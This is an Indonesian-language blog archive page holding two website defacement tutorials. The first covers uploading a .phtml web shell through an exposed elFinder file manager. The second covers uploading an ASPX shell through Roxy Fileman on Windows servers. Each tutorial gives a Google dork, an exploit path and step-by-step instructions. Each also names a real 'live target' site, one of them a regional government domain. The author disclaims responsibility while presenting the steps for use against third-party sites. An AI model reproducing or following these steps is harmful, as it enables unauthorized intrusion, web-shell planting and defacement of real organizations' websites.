Randa: Hacking

Randa

Browse through our gallery of expertly-crafted themes to find the perfect one for your needs.


CONTACT FOLLOW
Popular Searches: Tentop, Sempaq, Londri Gigi
Home / Hacking
Naufal Ardhani - Hallo gaess kali ini gua bakal bagiin Tutorial Deface elFinder + Upload Shell, Exploit ini sudah cukup lama ya tapi masih ada aja website yang masih vuln dengan exploit ini :v
dan pas gua lagi Pentest web http://labuankec.pandeglangkab.go.id/ gua nemuin directory /elFinder/ dan langsung aja gua upload shell dan bugnya dah ditambel.

Dork :

  • inurl:elfinder/elfinder.php.html ( dork kembangin lagi ya biar dapet yang vuln )
Exploit :
  • www.site.com/[path]/elfinder/elfinder.php.html
Live Target : http://labuankec.pandeglangkab.go.id/


Step :
  1. Dorking di google, pilih target dan kasih exploit satu satu
  2. dan Disini gua pake Live Target dan beri exploitnya : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts/elfinder/elfinder.php.html
  3. Langsung aja Upload Shell dengan ekstensi .phtml 
  4. lalu Akses deh Shellnya di www.site.com/[path]/elfinder/files/oxy.phtml


Sekian Tutorial Deface elFinder + Upload Shell semoga bermanfaat ilmunya.

nb : saya tidak bertanggung jawab atas apa yang kalian telah lakukan karna saya hanya membagikan ilmu untuk membantu admin web :3

Tutorial Deface elFinder + Upload Shell

Tutorial Cara Deface Metode Effi File Manager - Hai guys kali ini saya ingin memberitahu tentang Tutorial Cara Deface Metode Effi File Manager Upload Shell kalau kalian belom pernah coba poc yang satu ini akan sedikit membuat bingung karna target memakai windows server hehe, kalo udah master lewat aja jangan bully.




Yang Dibutuhkan :

  1. ASPX Shell ( khusus untuk windows server ) | Jika belom ada Download disini.
  2. Google Dork dan Exploit
  3. Pc / Android
  4. Kalem Terosss :v

Dork :
  • inurl:jquery.tinymce.roxy.fileman ( kembangkan lagi )

Exploit : 
  • /jquery.tinymce.roxy.fileman/

Step :
  1. Dorking dulu webnya, jika sudah pilih salah satu.
  2. kasih exploit, contoh : www.site.com/jquery.tinymce.roxy.fileman/ s
  3. Lalu Upload Shellnya, misal : shell.aspx, tunggu sampai 100% berhasil.
  4. Lalu untuk preview Shellnnya, buka www.site.com/jquery.tinymce.roxy.fileman/directory/shell.aspx 
  5. Sudah seperti gambar diatas? yaudah itu udah terserah kalian, tapi kalau saya menitip file di dir htdocs/index.htm


Live Target : https://redoxomics.febsevents.org/

Dibuat Oleh : ./E4OXY 

Nb : Saya tidak bertanggung jawab jika terjadi masalah, saya disini hanya membagikan ilmu, dan gunakan sebaik baiknya :)

Tutorial Cara Deface Metode Effi File Manager Upload Shell Vulnerability

Langganan: Postingan (Atom)

Teraniaya

Halo, Ada yang bisa dibantu? Silahkan chat dengan tim kami
Admin kami akan membalas dalam beberapa menit
CS & Admin Customer Service